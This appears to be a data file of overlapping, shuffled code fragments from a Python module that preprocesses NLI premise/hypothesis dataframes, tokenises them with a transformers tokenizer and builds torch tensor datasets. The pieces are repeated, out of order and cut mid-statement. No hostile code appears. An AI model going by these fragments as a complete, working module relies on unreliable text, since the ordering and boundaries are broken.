"(columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer =",
"[\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i for",
"function applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores)",
"for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True,",
"= hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id =",
"\"\"\" return clean version of the dataframe with the original index \"\"\" df_new",
"for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features], dtype=torch.long)",
"return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function",
"else 0] * len(input_ids) # Zero-pad up to the sequence length. padding_length =",
"else 1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert",
"\"\"\"Processor for the any nli dataf frame in csv (columns = premise |",
"parallelize a function applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool",
"if x[0] == \" \": return x[1:] else: return x except IndexError: return",
"non words, removing space in the first position and removing double spaces :param",
"df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split))",
"\"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index",
"+ \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1:",
"path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features",
"np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result",
"data frame with the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data,",
"input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids",
"s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) #",
"self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy()",
":type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label",
"[] n = df.shape[0] for i in range(n): example = df.loc[i] name =",
"self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = []",
"df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis,",
"x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa remove space",
"mask has 1 for real tokens and 0 for padding tokens. Only real",
"pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a",
"mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example) in",
"%s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples =",
"data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '',",
"simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\":",
"hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"]",
"= np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return",
"self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True)",
"pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features",
"hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df,",
"length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label))",
"pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy()",
"import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor",
"by lowering, removing non words, removing space in the first position and removing",
"\"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new =",
"if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples,",
"assert len(input_ids) == max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length)",
"df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return",
"pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for",
"self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero",
"super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"]",
"\"\"\" try: if x[0] == \" \": return x[1:] else: return x except",
"the training and dev sets.\"\"\" examples = [] n = df.shape[0] for i",
"Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from",
"for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features],",
"= len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"]",
"length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input",
"= df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class",
"has 1 for real tokens and 0 for padding tokens. Only real #",
"= [ 1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to",
"return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by",
"def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self,",
"= df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df,",
"df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\"",
"in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new",
"([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length)",
":type text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower())",
"parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf",
"= token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with",
"n_cores) return result def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode,",
"n_cores): \"\"\" general fucntion to parallelize a function applied to a df \"\"\"",
"enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids =",
"for the training and dev sets.\"\"\" examples = [] n = df.shape[0] for",
"= hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df",
"to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df =",
"new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\":",
"spaces :param data: data frame with the colum 'text' :type data: pd.DataFrame :param",
"The mask has 1 for real tokens and 0 for padding tokens. Only",
"o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index}",
"len(input_ids) == max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length) assert",
"= max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids",
"n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index",
"%s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features],",
"| label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left",
"[f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in features],",
"dataframe by lowering, removing non words, removing space in the first position and",
"return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index",
"= torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for",
"len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] #",
"in the first position and removing double spaces :param data: data frame with",
"df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list =",
"length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length)",
"| hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length =",
"pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df,",
"n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in",
"import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def",
"df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return",
"\"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close()",
"preprocess on the input text from a NLI dataframe :param data: data frame",
"examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id",
"return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input",
"Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores):",
"def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy()",
"s = s.apply(remove_first_space) # noqa remove space in the first position s =",
":type x: str :return: word withou space in front :rtype: str \"\"\" try:",
"parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to a",
"max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label]",
"features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading",
"dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index",
"= label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result",
"x))) # noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess",
"label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return",
"example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid,",
"if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence length.",
"set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples",
"token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error",
"= InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length =",
"= s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa",
"torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f in",
"> -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features =",
"for the any nli dataf frame in csv (columns = premise | hypothesis",
"__init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token",
"df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] =",
"def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering, removing",
"are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids)",
"self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path)",
"df_split = np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join()",
"n = df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index",
"return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\"",
"= self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features =",
"spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from",
"self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type):",
"def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df,",
"= ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] *",
"logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df,",
"examples for the training and dev sets.\"\"\" examples = [] n = df.shape[0]",
"set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples = [] n",
"text from dataframe by lowering, removing non words, removing space in the first",
"remove_first_space(x): \"\"\" remove_first_space from word x :param x: word :type x: str :return:",
"general fucntion to parallelize a function applied to a df \"\"\" df_split =",
"text_column): \"\"\" preprocess all input text from dataframe by lowering, removing non words,",
"n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\",",
"mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path)",
"in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels",
"[] for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\"",
"'', x))) # noqa s = s.apply(remove_first_space) # noqa remove space in the",
"label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores):",
"os import pandas as pd import numpy as np from multiprocessing import Pool",
"if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0 if",
"{\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'):",
"word :type x: str :return: word withou space in front :rtype: str \"\"\"",
"= df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new",
"\"\"\" general fucntion to parallelize a function applied to a df \"\"\" df_split",
"s.apply(remove_first_space) # noqa remove space in the first position s = s.apply((lambda x:",
"dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def",
"the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column: str",
"Apply preprocess on the input text from a NLI dataframe :param data: data",
"= np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return",
"df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples,",
"as pd import numpy as np from multiprocessing import Pool import random from",
"as np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures",
"frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type",
"\"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new =",
"example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids,",
"cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f",
"text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h,",
"token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask +",
"s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa remove",
"mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) +",
"df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"]",
"df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] =",
"parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"]",
"text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ =",
"x: word :type x: str :return: word withou space in front :rtype: str",
"return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels()",
"self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path = self.base_path +",
"in front :rtype: str \"\"\" try: if x[0] == \" \": return x[1:]",
"df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any",
"InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces =",
"= pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df,",
"df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples = []",
"padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids =",
"the first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove",
"guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples",
"def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"]",
"examples = [] n = df.shape[0] for i in range(n): example = df.loc[i]",
"\"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples",
"pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label",
"file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else: examples",
"input text from a NLI dataframe :param data: data frame with the colum",
"any nli dataf frame in csv (columns = premise | hypothesis | label)\"\"\"",
"range(n): example = df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example =",
"input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length",
"withou space in front :rtype: str \"\"\" try: if x[0] == \" \":",
"len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length {} vs {}\".format(",
"n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self):",
"return result def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length)",
"logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor(",
":param data: data frame with the colum 'text' :type data: pd.DataFrame :param text_column:",
"token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and",
"with the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h",
"return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function",
"-1: examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples,",
"\"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with",
"\"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df,",
"from dataframe by lowering, removing non words, removing space in the first position",
"in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids",
"hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"]",
"import numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils import",
"= premise | hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"]",
"([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] *",
"\"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length,",
"new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index =",
"self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example)",
"input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero",
"0 for padding tokens. Only real # tokens are attended to. attention_mask =",
"assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids",
"(ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length)",
"frame with the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\")",
"x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text",
"space in the first position and removing double spaces :param data: data frame",
"import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data",
"label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token",
"= example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example)",
"\"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new",
"label = data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\":",
"return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i",
"hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"]",
"result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map",
"examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero",
"torch import os import pandas as pd import numpy as np from multiprocessing",
"to parallelize a function applied to a df \"\"\" df_split = np.array_split(df, n_cores)",
"= df.loc[i] name = example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise,",
"position and removing double spaces :param data: data frame with the colum 'text'",
"data frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum text_column",
"to the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids =",
"pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion",
"torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids, all_labels)",
"df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file:",
"front :rtype: str \"\"\" try: if x[0] == \" \": return x[1:] else:",
"# noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on",
"s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI",
"label_list = self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return",
"= [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs = self.tokenizer.encode_plus(example.text_a,",
"tokens. Only real # tokens are attended to. attention_mask = [ 1 if",
"multiprocessing import Pool import random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import",
"([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id]",
"applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result",
"the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token]",
"try: if x[0] == \" \": return x[1:] else: return x except IndexError:",
"df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df,",
"and 0 for padding tokens. Only real # tokens are attended to. attention_mask",
"from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile('",
"all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids",
"pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI dataframe :param",
"real # tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else",
"== max_length, \"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask)",
"([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1]",
"# The mask has 1 for real tokens and 0 for padding tokens.",
"input length {} vs {}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,",
"'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\")",
"= simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index",
"df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor",
"example.o_index guid = \"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return",
"vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length {}",
"vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length {}",
"= s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces return s",
"torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor(",
"position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces",
"return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a",
"index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new",
"label_map = {label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self,",
"self.get_labels() label_map = {label: i for i, label in enumerate(label_list)} return label_map def",
